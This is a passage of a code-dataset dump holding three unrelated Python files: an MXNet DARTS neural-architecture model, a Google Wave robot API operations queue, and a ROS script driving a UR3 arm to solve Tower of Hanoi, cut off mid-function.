DartsReduceBranch(HybridBlock):\n \"\"\"\n DARTS specific factorized reduce block.\n\n Parameters:\n ----------\n in_channels : int\n Number of input channels.\n out_channels : int\n Number of output channels.\n strides : int or tuple/list of 2 int, default 2\n Strides of the convolution.\n \"\"\"\n def __init__(self,\n in_channels,\n out_channels,\n strides=2,\n **kwargs):\n super(DartsReduceBranch, self).__init__(**kwargs)\n assert (out_channels % 2 == 0)\n mid_channels = out_channels // 2\n\n with self.name_scope():\n self.activ = nn.Activation(\"relu\")\n self.conv1 = conv1x1(\n in_channels=in_channels,\n out_channels=mid_channels,\n strides=strides)\n self.conv2 = conv1x1(\n in_channels=in_channels,\n out_channels=mid_channels,\n strides=strides)\n self.bn = nn.BatchNorm(in_channels=out_channels)\n\n def hybrid_forward(self, F, x):\n x = self.activ(x)\n x1 = self.conv1(x)\n x = F.slice(x, begin=(None, None, 1, 1), end=(None, None, None, None))\n x2 = self.conv2(x)\n x = F.concat(x1, x2, dim=1)\n x = self.bn(x)\n return x\n\n\nclass Stem1Unit(HybridBlock):\n \"\"\"\n DARTS Stem1 unit.\n\n Parameters:\n ----------\n in_channels : int\n Number of input channels.\n out_channels : int\n Number of output channels.\n \"\"\"\n def __init__(self,\n in_channels,\n out_channels,\n **kwargs):\n super(Stem1Unit, self).__init__(**kwargs)\n mid_channels = out_channels // 2\n\n with self.name_scope():\n self.conv1 = darts_conv3x3_s2(\n in_channels=in_channels,\n out_channels=mid_channels,\n activate=False)\n self.conv2 = darts_conv3x3_s2(\n in_channels=mid_channels,\n out_channels=out_channels,\n activate=True)\n\n def hybrid_forward(self, F, x):\n x = self.conv1(x)\n x = self.conv2(x)\n return x\n\n\ndef stem2_unit(in_channels,\n out_channels):\n \"\"\"\n DARTS Stem2 unit.\n\n Parameters:\n ----------\n in_channels : int\n Number of input channels.\n out_channels : int\n Number of output channels.\n \"\"\"\n return darts_conv3x3_s2(\n in_channels=in_channels,\n out_channels=out_channels,\n activate=True)\n\n\ndef darts_maxpool3x3(channels,\n strides):\n \"\"\"\n DARTS specific 3x3 Max pooling layer.\n\n Parameters:\n ----------\n channels : int\n Number of input/output channels. Unused parameter.\n strides : int or tuple/list of 2 int\n Strides of the convolution.\n \"\"\"\n assert (channels > 0)\n return nn.MaxPool2D(\n pool_size=3,\n strides=strides,\n padding=1)\n\n\ndef darts_skip_connection(channels,\n strides):\n \"\"\"\n DARTS specific skip connection layer.\n\n Parameters:\n ----------\n channels : int\n Number of input/output channels.\n strides : int or tuple/list of 2 int\n Strides of the convolution.\n \"\"\"\n assert (channels > 0)\n if strides == 1:\n return Identity()\n else:\n assert (strides == 2)\n return DartsReduceBranch(\n in_channels=channels,\n out_channels=channels,\n strides=strides)\n\n\ndef darts_dws_conv3x3(channels,\n strides):\n \"\"\"\n 3x3 version of DARTS specific dilated convolution block.\n\n Parameters:\n ----------\n channels : int\n Number of input/output channels.\n strides : int or tuple/list of 2 int\n Strides of the convolution.\n \"\"\"\n return DartsDwsConv(\n in_channels=channels,\n out_channels=channels,\n kernel_size=3,\n strides=strides,\n padding=2,\n dilation=2)\n\n\ndef darts_dws_branch3x3(channels,\n strides):\n \"\"\"\n 3x3 version of DARTS specific dilated convolution branch.\n\n Parameters:\n ----------\n channels : int\n Number of input/output channels.\n strides : int or tuple/list of 2 int\n Strides of the convolution.\n \"\"\"\n return DartsDwsBranch(\n in_channels=channels,\n out_channels=channels,\n kernel_size=3,\n strides=strides,\n padding=1)\n\n\n# Set of operations in genotype.\nGENOTYPE_OPS = {\n 'max_pool_3x3': darts_maxpool3x3,\n 'skip_connect': darts_skip_connection,\n 'dil_conv_3x3': darts_dws_conv3x3,\n 'sep_conv_3x3': darts_dws_branch3x3,\n}\n\n\nclass DartsMainBlock(HybridBlock):\n \"\"\"\n DARTS main block, described by genotype.\n\n Parameters:\n ----------\n genotype : list of tuples (str, int)\n List of genotype elements (operations and linked indices).\n channels : int\n Number of input/output channels.\n reduction : bool\n Whether use reduction.\n \"\"\"\n def __init__(self,\n genotype,\n channels,\n reduction,\n **kwargs):\n super(DartsMainBlock, self).__init__(**kwargs)\n self.concat = [2, 3, 4, 5]\n op_names, indices = zip(*genotype)\n self.indices = indices\n self.steps = len(op_names) // 2\n\n with self.name_scope():\n for i, (name, index) in enumerate(zip(op_names, indices)):\n stride = 2 if reduction and index < 2 else 1\n setattr(self, \"ops{}\".format(i + 1), GENOTYPE_OPS[name](channels, stride))\n\n def hybrid_forward(self, F, x, x_prev):\n s0 = x_prev\n s1 = x\n states = [s0, s1]\n for i in range(self.steps):\n j1 = 2 * i\n j2 = 2 * i + 1\n op1 = getattr(self, \"ops{}\".format(j1 + 1))\n op2 = getattr(self, \"ops{}\".format(j2 + 1))\n y1 = states[self.indices[j1]]\n y2 = states[self.indices[j2]]\n y1 = op1(y1)\n y2 = op2(y2)\n s = y1 + y2\n states += [s]\n x_out = F.concat(*[states[i] for i in self.concat], dim=1)\n return x_out\n\n\nclass DartsUnit(HybridBlock):\n \"\"\"\n DARTS unit.\n\n Parameters:\n ----------\n in_channels : int\n Number of input channels.\n prev_in_channels : int\n Number of input channels in previous input.\n out_channels : int\n Number of output channels.\n genotype : list of tuples (str, int)\n List of genotype elements (operations and linked indices).\n reduction : bool\n Whether use reduction.\n prev_reduction : bool\n Whether use previous reduction.\n \"\"\"\n def __init__(self,\n in_channels,\n prev_in_channels,\n out_channels,\n genotype,\n reduction,\n prev_reduction,\n **kwargs):\n super(DartsUnit, self).__init__(**kwargs)\n mid_channels = out_channels // 4\n\n with self.name_scope():\n if prev_reduction:\n self.preprocess_prev = DartsReduceBranch(\n in_channels=prev_in_channels,\n out_channels=mid_channels)\n else:\n self.preprocess_prev = darts_conv1x1(\n in_channels=prev_in_channels,\n out_channels=mid_channels)\n\n self.preprocess = darts_conv1x1(\n in_channels=in_channels,\n out_channels=mid_channels)\n\n self.body = DartsMainBlock(\n genotype=genotype,\n channels=mid_channels,\n reduction=reduction)\n\n def hybrid_forward(self, F, x, x_prev):\n x = self.preprocess(x)\n x_prev = self.preprocess_prev(x_prev)\n x_out = self.body(x, x_prev)\n return x_out\n\n\nclass DARTS(HybridBlock):\n \"\"\"\n DARTS model from 'DARTS: Differentiable Architecture Search,' https://arxiv.org/abs/1806.09055.\n\n Parameters:\n ----------\n channels : list of list of int\n Number of output channels for each unit.\n stem_blocks_channels : int\n Number of output channels for the Stem units.\n in_channels : int, default 3\n Number of input channels.\n in_size : tuple of two ints, default (224, 224)\n Spatial size of the expected input image.\n classes : int, default 1000\n Number of classification classes.\n \"\"\"\n def __init__(self,\n channels,\n stem_blocks_channels,\n normal_genotype,\n reduce_genotype,\n in_channels=3,\n in_size=(224, 224),\n classes=1000,\n **kwargs):\n super(DARTS, self).__init__(**kwargs)\n self.in_size = in_size\n self.classes = classes\n\n with self.name_scope():\n self.features = nasnet_dual_path_sequential(\n return_two=False,\n first_ordinals=2,\n last_ordinals=1)\n self.features.add(Stem1Unit(\n in_channels=in_channels,\n out_channels=stem_blocks_channels))\n in_channels = stem_blocks_channels\n self.features.add(stem2_unit(\n in_channels=in_channels,\n out_channels=stem_blocks_channels))\n prev_in_channels = in_channels\n in_channels = stem_blocks_channels\n\n for i, channels_per_stage in enumerate(channels):\n stage = nasnet_dual_path_sequential(prefix=\"stage{}_\".format(i + 1))\n for j, out_channels in enumerate(channels_per_stage):\n reduction = (i != 0) and (j == 0)\n prev_reduction = ((i == 0) and (j == 0)) or ((i != 0) and (j == 1))\n genotype = reduce_genotype if reduction else normal_genotype\n stage.add(DartsUnit(\n in_channels=in_channels,\n prev_in_channels=prev_in_channels,\n out_channels=out_channels,\n genotype=genotype,\n reduction=reduction,\n prev_reduction=prev_reduction))\n prev_in_channels = in_channels\n in_channels = out_channels\n self.features.add(stage)\n self.features.add(nn.AvgPool2D(\n pool_size=7,\n strides=1))\n\n self.output = nn.HybridSequential(prefix=\"\")\n self.output.add(nn.Flatten())\n self.output.add(nn.Dense(\n units=classes,\n in_units=in_channels))\n\n def hybrid_forward(self, F, x):\n x = self.features(x)\n x = self.output(x)\n return x\n\n\ndef get_darts(model_name=None,\n pretrained=False,\n ctx=cpu(),\n root=os.path.join(\"~\", \".mxnet\", \"models\"),\n **kwargs):\n \"\"\"\n Create DARTS model with specific parameters.\n\n Parameters:\n ----------\n model_name : str or None, default None\n Model name for loading pretrained model.\n pretrained : bool, default False\n Whether to load the pretrained weights for model.\n ctx : Context, default CPU\n The context in which to load the pretrained weights.\n root : str, default '~/.mxnet/models'\n Location for keeping the model parameters.\n \"\"\"\n stem_blocks_channels = 48\n layers = [4, 5, 5]\n channels_per_layers = [192, 384, 768]\n channels = [[ci] * li for (ci, li) in zip(channels_per_layers, layers)]\n\n normal_genotype = [\n ('sep_conv_3x3', 0),\n ('sep_conv_3x3', 1),\n ('sep_conv_3x3', 0),\n ('sep_conv_3x3', 1),\n ('sep_conv_3x3', 1),\n ('skip_connect', 0),\n ('skip_connect', 0),\n ('dil_conv_3x3', 2)]\n reduce_genotype = [\n ('max_pool_3x3', 0),\n ('max_pool_3x3', 1),\n ('skip_connect', 2),\n ('max_pool_3x3', 1),\n ('max_pool_3x3', 0),\n ('skip_connect', 2),\n ('skip_connect', 2),\n ('max_pool_3x3', 1)]\n\n net = DARTS(\n channels=channels,\n stem_blocks_channels=stem_blocks_channels,\n normal_genotype=normal_genotype,\n reduce_genotype=reduce_genotype,\n **kwargs)\n\n if pretrained:\n if (model_name is None) or (not model_name):\n raise ValueError(\"Parameter `model_name` should be properly initialized for loading pretrained model.\")\n from .model_store import get_model_file\n net.load_parameters(\n filename=get_model_file(\n model_name=model_name,\n local_model_store_dir_path=root),\n ctx=ctx)\n\n return net\n\n\ndef darts(**kwargs):\n \"\"\"\n DARTS model from 'DARTS: Differentiable Architecture Search,' https://arxiv.org/abs/1806.09055.\n\n Parameters:\n ----------\n pretrained : bool, default False\n Whether to load the pretrained weights for model.\n ctx : Context, default CPU\n The context in which to load the pretrained weights.\n root : str, default '~/.mxnet/models'\n Location for keeping the model parameters.\n \"\"\"\n return get_darts(model_name=\"darts\", **kwargs)\n\n\ndef _test():\n import numpy as np\n import mxnet as mx\n\n pretrained = False\n\n models = [\n darts,\n ]\n\n for model in models:\n\n net = model(pretrained=pretrained)\n\n ctx = mx.cpu()\n if not pretrained:\n net.initialize(ctx=ctx)\n\n net_params = net.collect_params()\n weight_count = 0\n for param in net_params.values():\n if (param.shape is None) or (not param._differentiable):\n continue\n weight_count += np.prod(param.shape)\n print(\"m={}, {}\".format(model.__name__, weight_count))\n assert (model != darts or weight_count == 4718752)\n\n x = mx.nd.zeros((1, 3, 224, 224), ctx=ctx)\n y = net(x)\n assert (y.shape == (1, 1000))\n\n\nif __name__ == \"__main__\":\n _test()\n","repo_name":"osmr/imgclsmob","sub_path":"gluon/gluoncv2/models/darts.py","file_name":"darts.py","file_ext":"py","file_size_in_byte":21552,"program_lang":"python","lang":"en","doc_type":"code","stars":2864,"dataset":"github-code","pt":"37"} +{"seq_id":"70982471468","text":"import errors\nimport random\nimport util\nimport sys\n\n\nPROTOCOL_VERSION = '0.22'\n\n# Operation Types\nWAVELET_APPEND_BLIP = 'wavelet.appendBlip'\nWAVELET_SET_TITLE = 'wavelet.setTitle'\nWAVELET_ADD_PARTICIPANT = 'wavelet.participant.add'\nWAVELET_DATADOC_SET = 'wavelet.datadoc.set'\nWAVELET_MODIFY_TAG = 'wavelet.modifyTag'\nWAVELET_MODIFY_PARTICIPANT_ROLE = 'wavelet.modifyParticipantRole'\nBLIP_CONTINUE_THREAD = 'blip.continueThread'\nBLIP_CREATE_CHILD = 'blip.createChild'\nBLIP_DELETE = 'blip.delete'\nDOCUMENT_APPEND_MARKUP = 'document.appendMarkup'\nDOCUMENT_INLINE_BLIP_INSERT = 'document.inlineBlip.insert'\nDOCUMENT_MODIFY = 'document.modify'\nROBOT_CREATE_WAVELET = 'robot.createWavelet'\nROBOT_FETCH_WAVE = 'robot.fetchWave'\nROBOT_NOTIFY = 'robot.notify'\nROBOT_SEARCH = 'robot.search'\n\n# Assign always NOTIFY_OP_ID to the notify operation so\n# we can easily filter it out later\nNOTIFY_OP_ID = '0'\n\nclass Operation(object):\n \"\"\"Represents a generic operation applied on the server.\n\n This operation class contains data that is filled in depending on the\n operation type.\n\n It can be used directly, but doing so will not result\n in local, transient reflection of state on the blips. In other words,\n creating a 'delete blip' operation will not remove the blip from the local\n context for the duration of this session. It is better to use the OpBased\n model classes directly instead.\n \"\"\"\n\n def __init__(self, method, opid, params):\n \"\"\"Initializes this operation with contextual data.\n\n Args:\n method: Method to call or type of operation.\n opid: The id of the operation. Any callbacks will refer to these.\n params: An operation type dependent dictionary\n \"\"\"\n self.method = method\n self.id = opid\n self.params = params\n\n def __str__(self):\n return '%s[%s]%s' % (self.method, self.id, str(self.params))\n\n def set_param(self, param, value):\n self.params[param] = value\n return self\n\n def serialize(self, method_prefix=''):\n \"\"\"Serialize the operation.\n\n Args:\n method_prefix: prefixed for each method name to allow for specifying\n a namespace.\n\n Returns:\n a dict representation of the operation.\n \"\"\"\n if method_prefix and not method_prefix.endswith('.'):\n method_prefix += '.'\n return {'method': method_prefix + self.method,\n 'id': self.id,\n 'params': util.serialize(self.params)}\n\n def set_optional(self, param, value):\n \"\"\"Sets an optional parameter.\n\n If value is None or \"\", this is a no op. Otherwise it calls\n set_param.\n \"\"\"\n if value == '' or value is None:\n return self\n else:\n return self.set_param(param, value)\n\n\nclass OperationQueue(object):\n \"\"\"Wraps the queuing of operations using easily callable functions.\n\n The operation queue wraps single operations as functions and queues the\n resulting operations in-order. Typically there shouldn't be a need to\n call this directly unless operations are needed on entities outside\n of the scope of the robot. For example, to modify a blip that\n does not exist in the current context, you might specify the wave, wavelet\n and blip id to generate an operation.\n\n Any calls to this will not be reflected in the robot in any way.\n For example, calling wavelet_append_blip will not result in a new blip\n being added to the robot, only an operation to be applied on the\n server.\n \"\"\"\n\n # Some class global counters:\n _next_operation_id = 1\n\n def __init__(self, proxy_for_id=None):\n self.__pending = []\n self._capability_hash = None\n self._proxy_for_id = proxy_for_id\n\n def _new_blipdata(self, wave_id, wavelet_id, initial_content='',\n parent_blip_id=None):\n \"\"\"Creates JSON of the blip used for this session.\"\"\"\n temp_blip_id = 'TBD_%s_%s' % (wavelet_id,\n hex(random.randint(0, sys.maxint)))\n return {'waveId': wave_id,\n 'waveletId': wavelet_id,\n 'blipId': temp_blip_id,\n 'content': initial_content,\n 'parentBlipId': parent_blip_id}\n\n def _new_waveletdata(self, domain, participants):\n \"\"\"Creates an ephemeral WaveletData instance used for this session.\n\n Args:\n domain: the domain to create the data for.\n participants initially on the wavelet\n Returns:\n Blipdata (for the rootblip), WaveletData.\n \"\"\"\n wave_id = domain + '!TBD_%s' % hex(random.randint(0, sys.maxint))\n wavelet_id = domain + '!conv+root'\n root_blip_data = self._new_blipdata(wave_id, wavelet_id)\n participants = set(participants)\n wavelet_data = {'waveId': wave_id,\n 'waveletId': wavelet_id,\n 'rootBlipId': root_blip_data['blipId'],\n 'participants': participants}\n return root_blip_data, wavelet_data\n\n def __len__(self):\n return len(self.__pending)\n\n def __iter__(self):\n return self.__pending.__iter__()\n\n def clear(self):\n self.__pending = []\n\n def proxy_for(self, proxy):\n \"\"\"Return a view of this operation queue with the proxying for set to proxy.\n\n This method returns a new instance of an operation queue that shares the\n operation list, but has a different proxying_for_id set so the robot using\n this new queue will send out operations with the proxying_for field set.\n \"\"\"\n res = OperationQueue()\n res.__pending = self.__pending\n res._capability_hash = self._capability_hash\n res._proxy_for_id = proxy\n return res\n\n def set_capability_hash(self, capability_hash):\n self._capability_hash = capability_hash\n\n def serialize(self, method_prefix=''):\n first = Operation(ROBOT_NOTIFY,\n NOTIFY_OP_ID,\n {'capabilitiesHash': self._capability_hash,\n 'protocolVersion': PROTOCOL_VERSION})\n operations = [first] + self.__pending\n return [op.serialize(method_prefix=method_prefix) for op in operations]\n res = util.serialize(operations)\n return res\n\n def copy_operations(self, other_queue):\n \"\"\"Copy the pending operations from other_queue into this one.\"\"\"\n for op in other_queue:\n self.__pending.append(op)\n\n def new_operation(self, method, wave_id, wavelet_id, props=None, **kwprops):\n \"\"\"Creates and adds a new operation to the operation list.\"\"\"\n if props is None:\n props = {}\n props.update(kwprops)\n if wave_id is not None:\n props['waveId'] = wave_id\n if wavelet_id is not None:\n props['waveletId'] = wavelet_id\n if self._proxy_for_id:\n props['proxyingFor'] = self._proxy_for_id\n operation = Operation(method,\n 'op%s' % OperationQueue._next_operation_id,\n props)\n self.__pending.append(operation)\n OperationQueue._next_operation_id += 1\n return operation\n\n def wavelet_append_blip(self, wave_id, wavelet_id, initial_content=''):\n \"\"\"Appends a blip to a wavelet.\n\n Args:\n wave_id: The wave id owning the containing wavelet.\n wavelet_id: The wavelet id that this blip should be appended to.\n initial_content: optionally the content to start with\n\n Returns:\n JSON representing the information of the new blip.\n \"\"\"\n blip_data = self._new_blipdata(wave_id, wavelet_id, initial_content)\n self.new_operation(WAVELET_APPEND_BLIP, wave_id,\n wavelet_id, blipData=blip_data)\n return blip_data\n\n def wavelet_add_participant(self, wave_id, wavelet_id, participant_id):\n \"\"\"Adds a participant to a wavelet.\n\n Args:\n wave_id: The wave id owning that this operation is applied to.\n wavelet_id: The wavelet id that this operation is applied to.\n participant_id: Id of the participant to add.\n\n Returns:\n data for the root_blip, wavelet\n \"\"\"\n return self.new_operation(WAVELET_ADD_PARTICIPANT, wave_id, wavelet_id,\n participantId=participant_id)\n\n def wavelet_datadoc_set(self, wave_id, wavelet_id, name, data):\n \"\"\"Sets a key/value pair on the data document of a wavelet.\n\n Args:\n wave_id: The wave id owning that this operation is applied to.\n wavelet_id: The wavelet id that this operation is applied to.\n name: The key name for this data.\n data: The value of the data to set.\n Returns:\n The operation created.\n \"\"\"\n return self.new_operation(WAVELET_DATADOC_SET, wave_id, wavelet_id,\n datadocName=name, datadocValue=data)\n\n def robot_create_wavelet(self, domain, participants=None, message=''):\n \"\"\"Creates a new wavelet.\n\n Args:\n domain: the domain to create the wave in\n participants: initial participants on this wavelet or None if none\n message: an optional payload that is returned with the corresponding\n event.\n\n Returns:\n data for the root_blip, wavelet\n \"\"\"\n if participants is None:\n participants = []\n blip_data, wavelet_data = self._new_waveletdata(domain, participants)\n op = self.new_operation(ROBOT_CREATE_WAVELET,\n wave_id=wavelet_data['waveId'],\n wavelet_id=wavelet_data['waveletId'],\n waveletData=wavelet_data)\n op.set_optional('message', message)\n return blip_data, wavelet_data\n\n def robot_search(self, query, index=None, num_results=None):\n \"\"\"Execute a search request.\n\n For now this only makes sense in the data API. Wave does not maintain\n an index for robots so no results will be returned in that scenario.\n\n Args:\n query: what to search for\n index: what index to search from\n num_results: how many results to return\n Returns:\n The operation created.\n \"\"\"\n op = self.new_operation(\n ROBOT_SEARCH, wave_id=None, wavelet_id=None, query=query)\n if index is not None:\n op.set_param('index', index)\n if num_results is not None:\n op.set_param('numResults', num_results)\n return op\n\n def robot_fetch_wave(self, wave_id, wavelet_id,\n raw_deltas_from_version=-1, return_raw_snapshot=False):\n \"\"\"Requests a snapshot of the specified wavelet.\n\n Args:\n wave_id: The wave id owning that this operation is applied to.\n wavelet_id: The wavelet id that this operation is applied to.\n raw_deltas_from_version: If specified, return a raw dump of the\n delta history of this wavelet, starting at the given version.\n This may return only part of the history; use additional\n requests with higher raw_deltas_from_version parameters to\n get the rest.\n return_raw_snapshot: if true, return the raw data for this\n wavelet.\n Returns:\n The operation created.\n \"\"\"\n op = self.new_operation(ROBOT_FETCH_WAVE, wave_id, wavelet_id)\n if raw_deltas_from_version != -1:\n op.set_param('rawDeltasFromVersion', raw_deltas_from_version)\n if return_raw_snapshot:\n op.set_param('returnRawSnapshot', return_raw_snapshot)\n return op\n\n def wavelet_set_title(self, wave_id, wavelet_id, title):\n \"\"\"Sets the title of a wavelet.\n\n Args:\n wave_id: The wave id owning that this operation is applied to.\n wavelet_id: The wavelet id that this operation is applied to.\n title: The title to set.\n Returns:\n The operation created.\n \"\"\"\n return self.new_operation(WAVELET_SET_TITLE, wave_id, wavelet_id,\n waveletTitle=title)\n\n def wavelet_modify_participant_role(\n self, wave_id, wavelet_id, participant_id, role):\n \"\"\"Modify the role of a participant on a wavelet.\n\n Args:\n wave_id: The wave id owning that this operation is applied to.\n wavelet_id: The wavelet id that this operation is applied to.\n participant_id: Id of the participant to add.\n role: the new roles\n\n Returns:\n data for the root_blip, wavelet\n \"\"\"\n return self.new_operation(WAVELET_MODIFY_PARTICIPANT_ROLE, wave_id,\n wavelet_id, participantId=participant_id,\n participantRole=role)\n\n def wavelet_modify_tag(self, wave_id, wavelet_id, tag, modify_how=None):\n \"\"\"Modifies a tag in a wavelet.\n\n Args:\n wave_id: The wave id owning that this operation is applied to.\n wavelet_id: The wavelet id that this operation is applied to.\n tag: The tag (a string).\n modify_how: (optional) how to apply the tag. The default is to add\n the tag. Specify 'remove' to remove. Specify None or 'add' to\n add.\n Returns:\n The operation created.\n \"\"\"\n return self.new_operation(WAVELET_MODIFY_TAG, wave_id, wavelet_id,\n name=tag).set_optional(\"modify_how\", modify_how)\n\n def blip_create_child(self, wave_id, wavelet_id, blip_id):\n \"\"\"Creates a child blip of another blip.\n\n Args:\n wave_id: The wave id owning that this operation is applied to.\n wavelet_id: The wavelet id that this operation is applied to.\n blip_id: The blip id that this operation is applied to.\n\n Returns:\n JSON of blip for which further operations can be applied.\n \"\"\"\n blip_data = self._new_blipdata(wave_id, wavelet_id, parent_blip_id=blip_id)\n self.new_operation(BLIP_CREATE_CHILD, wave_id, wavelet_id,\n blipId=blip_id,\n blipData=blip_data)\n return blip_data\n\n def blip_continue_thread(self, wave_id, wavelet_id, blip_id):\n \"\"\"Creates a blip in same thread as specified blip.\n\n Args:\n wave_id: The wave id owning that this operation is applied to.\n wavelet_id: The wavelet id that this operation is applied to.\n blip_id: The blip id that this operation is applied to.\n\n Returns:\n JSON of blip for which further operations can be applied.\n \"\"\"\n blip_data = self._new_blipdata(wave_id, wavelet_id)\n self.new_operation(BLIP_CONTINUE_THREAD, wave_id, wavelet_id,\n blipId=blip_id,\n blipData=blip_data)\n return blip_data\n\n\n def blip_delete(self, wave_id, wavelet_id, blip_id):\n \"\"\"Deletes the specified blip.\n\n Args:\n wave_id: The wave id owning that this operation is applied to.\n wavelet_id: The wavelet id that this operation is applied to.\n blip_id: The blip id that this operation is applied to.\n Returns:\n The operation created.\n \"\"\"\n return self.new_operation(BLIP_DELETE, wave_id, wavelet_id, blipId=blip_id)\n\n def document_append_markup(self, wave_id, wavelet_id, blip_id, content):\n \"\"\"Appends content with markup to a document.\n\n Args:\n wave_id: The wave id owning that this operation is applied to.\n wavelet_id: The wavelet id that this operation is applied to.\n blip_id: The blip id that this operation is applied to.\n content: The markup content to append.\n Returns:\n The operation created.\n \"\"\"\n return self.new_operation(DOCUMENT_APPEND_MARKUP, wave_id, wavelet_id,\n blipId=blip_id, content=content)\n\n def document_modify(self, wave_id, wavelet_id, blip_id):\n \"\"\"Creates and queues a document modify operation\n\n The returned operation still needs to be filled with details before\n it makes sense.\n\n Args:\n wave_id: The wave id owning that this operation is applied to.\n wavelet_id: The wavelet id that this operation is applied to.\n blip_id: The blip id that this operation is applied to.\n Returns:\n The operation created.\n \"\"\"\n return self.new_operation(DOCUMENT_MODIFY,\n wave_id,\n wavelet_id,\n blipId=blip_id)\n\n def document_inline_blip_insert(self, wave_id, wavelet_id, blip_id, position):\n \"\"\"Inserts an inline blip at a specific location.\n\n Args:\n wave_id: The wave id owning that this operation is applied to.\n wavelet_id: The wavelet id that this operation is applied to.\n blip_id: The blip id that this operation is applied to.\n position: The position in the document to insert the blip.\n\n Returns:\n JSON data for the blip that was created for further operations.\n \"\"\"\n inline_blip_data = self._new_blipdata(wave_id, wavelet_id)\n inline_blip_data['parentBlipId'] = blip_id\n self.new_operation(DOCUMENT_INLINE_BLIP_INSERT, wave_id, wavelet_id,\n blipId=blip_id,\n index=position,\n blipData=inline_blip_data)\n return inline_blip_data\n","repo_name":"jparyani/wave","sub_path":"src/python/api/ops.py","file_name":"ops.py","file_ext":"py","file_size_in_byte":16445,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"37"} +{"seq_id":"72221227308","text":"#!/usr/bin/env python\n\n'''\nWe get inspirations of Tower of Hanoi algorithm from the website below.\nThis is also on the lab manual.\nSource: https://www.cut-the-knot.org/recurrence/hanoi.shtml\n'''\n\nimport os\nimport argparse\nimport copy\nimport time\nimport rospy\nimport rospkg\nimport numpy as np\nimport yaml\nimport sys\nfrom math import pi\nfrom project_header import *\nimport numpy as np\nfrom scipy.linalg import expm\nPI = 3.1415926535\n\n# 20Hz\nSPIN_RATE = 20\n\n# UR3 home location\n# home = np.radians([120, -90, 90, -90, -90, 0])\n\nhome = np.radians([151.30, -107.46, 116.14, -101.53, -92.15, 35.33])\n\n# Hanoi tower location 1\n# Q11 = [120*pi/180.0, -56*pi/180.0, 124*pi/180.0, -158*pi/180.0, -90*pi/180.0, 0*pi/180.0]\n# Q12 = [120*pi/180.0, -64*pi/180.0, 123*pi/180.0, -148*pi/180.0, -90*pi/180.0, 0*pi/180.0]\n# Q13 = [120*pi/180.0, -72*pi/180.0, 120*pi/180.0, -137*pi/180.0, -90*pi/180.0, 0*pi/180.0]\n\n\n# 1 - low to high\nQ11 = [136.14*pi/180.0, -61.1*pi/180.0, 141.09*pi/180.0, -173.2*pi/180.0, -90.67*pi/180.0, 19.99*pi/180.0]\nQ12 = [136.15*pi/180.0, -72.61*pi/180.0, 140.01*pi/180.0, -160.59*pi/180.0, -90.81*pi/180.0, 19.97*pi/180.0]\nQ13 = [136.13*pi/180.0, -82.54*pi/180.0, 137.42*pi/180.0, -148.07*pi/180.0, -90.96*pi/180.0, 19.95*pi/180.0]\n# Q13 = [136.12*pi/180.0, -98.74*pi/180.0, 124.83*pi/180.0, -119.29*pi/180.0, -91.22*pi/180.0, 20.04*pi/180.0]\n\n# 2 - low to high\nQ21 = [151.31*pi/180.0, -62.2*pi/180.0, 145.82*pi/180.0, -176.49*pi/180.0, -91.46*pi/180.0, 35.15*pi/180.0]\nQ22 = [151.33*pi/180.0, -74.98*pi/180.0, 144.63*pi/180.0, -162.52*pi/180.0, -91.61*pi/180.0, 35.13*pi/180.0]\nQ23 = [151.33*pi/180.0, -86.37*pi/180.0, 141.51*pi/180.0, -148*pi/180.0, -91.77*pi/180.0, 35.14*pi/180.0]\n\n# 3 - low to high\nQ31 = [169.86*pi/180.0, -61.61*pi/180.0, 143.19*pi/180.0, -173.76*pi/180.0, -92.3*pi/180.0, 53.69*pi/180.0]\nQ32 = [169.88*pi/180.0, -73.47*pi/180.0, 142.09*pi/180.0, -160.8*pi/180.0, -92.44*pi/180.0, 53.67*pi/180.0]\nQ33 = [169.88*pi/180.0, -84.11*pi/180.0, 139.19*pi/180.0, -147.26*pi/180.0, -92.59*pi/180.0, 53.69*pi/180.0]\n\n# starting and ending index to store user input\nstart_idx = 0\nmid_idx = 0\nend_idx = 0\ncounter = 0\nfrom_height = [2, 1, 0, 0, 1, 0, 0]\nto_height = [0, 0, 1, 0, 0, 1, 2]\n\nthetas = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0]\n\ndigital_in_0 = 0 # set to true if gripper is holding block\nanalog_in_0 = 0\n\nsuction_on = True\nsuction_off = False\ncurrent_io_0 = False # last state of the gripper - suction On or Off\ncurrent_position_set = False\n\n# UR3 current position, using home position for initialization\ncurrent_position = copy.deepcopy(home)\n\n\"\"\"\nTODO: Initialize Q matrix\n\"\"\"\n\nQ = [ [Q11, Q12, Q13], \\\n [Q21, Q22, Q23], \\\n [Q31, Q32, Q33] ]\n\n\n\"\"\"\nTODO: define a ROS topic callback funtion for getting the state of suction cup\nWhenever ur3/gripper_input publishes info this callback function is called.\n\"\"\"\ndef gripper_callback(msg):\n global digital_in_0\n global analog_in_0\n\n digital_in_0 = msg.DIGIN\n\n\n\n\n\"\"\"\nWhenever ur3/position publishes info, this callback function is called.\n\"\"\"\ndef position_callback(msg):\n\n global thetas\n global current_position\n global current_position_set\n\n thetas[0] = msg.position[0]\n thetas[1] = msg.position[1]\n thetas[2] = msg.position[2]\n thetas[3] = msg.position[3]\n thetas[4] = msg.position[4]\n thetas[5] = msg.position[5]\n\n current_position[0] = thetas[0]\n current_position[1] = thetas[1]\n current_position[2] = thetas[2]\n current_position[3] = thetas[3]\n current_position[4] = thetas[4]\n current_position[5] = thetas[5]\n\n current_position_set = True\n\n# suction on = true, suction off = false\ndef gripper(pub_cmd, loop_rate, io_0):\n\n global SPIN_RATE\n global thetas\n global current_io_0\n global current_position\n\n error = 0\n spin_count = 0\n at_goal = 0\n\n current_io_0 = io_0\n\n driver_msg = command()\n driver_msg.destination = current_position\n driver_msg.v = 1.0\n driver_msg.a = 1.0\n driver_msg.io_0 = io_0\n pub_cmd.publish(driver_msg)\n\n while(at_goal == 0):\n\n if( abs(thetas[0]-driver_msg.destination[0]) < 0.0005 and \\\n abs(thetas[1]-driver_msg.destination[1]) < 0.0005 and \\\n abs(thetas[2]-driver_msg.destination[2]) < 0.0005 and \\\n abs(thetas[3]-driver_msg.destination[3]) < 0.0005 and \\\n abs(thetas[4]-driver_msg.destination[4]) < 0.0005 and \\\n abs(thetas[5]-driver_msg.destination[5]) < 0.0005 ):\n\n at_goal = 1\n\n loop_rate.sleep()\n\n if(spin_count > SPIN_RATE*5):\n\n pub_cmd.publish(driver_msg)\n rospy.loginfo(\"Just published again driver_msg\")\n spin_count = 0\n\n spin_count = spin_count + 1\n\n return error\n\n\n\ndef Get_MS():\n\t# =================== Your code starts here ====================#\n\t# Fill in 